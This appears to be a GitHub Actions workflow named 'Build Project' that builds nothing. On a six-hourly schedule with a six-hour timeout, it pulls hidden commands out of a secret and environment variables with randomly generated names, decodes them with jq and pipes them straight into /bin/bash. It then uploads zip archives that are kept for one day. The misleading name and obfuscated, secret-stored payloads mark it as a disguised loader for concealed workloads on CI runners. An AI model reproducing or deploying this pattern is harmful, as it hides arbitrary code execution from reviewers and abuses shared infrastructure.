name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '45 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    name: Run task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Run
        env:
          dseh90725: ${{ secrets.dseh90725 }}
        run: |
          printf '%s' "$dseh90725" | jq -r .ezfu96 | /bin/bash
          printf '%s' "$x54" | jq -r .r3 | /bin/bash
          echo $xfid8 | jq -r .cs218 | /bin/bash
          echo $znt0913 | jq -r .gznr68730 | /bin/bash
          printf '%s' "$e71065" | jq -r .cxen05295 | /bin/bash
          printf '%s' "$txfzp47" | jq -r .vqzsz7852 | /bin/bash
          echo $pd78 | jq -r .o9307 | /bin/bash
          echo $jzkt51859 | jq -r .zjmah2985 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: G4pZLUhp
          path: "*.zip"
          retention-days: 1
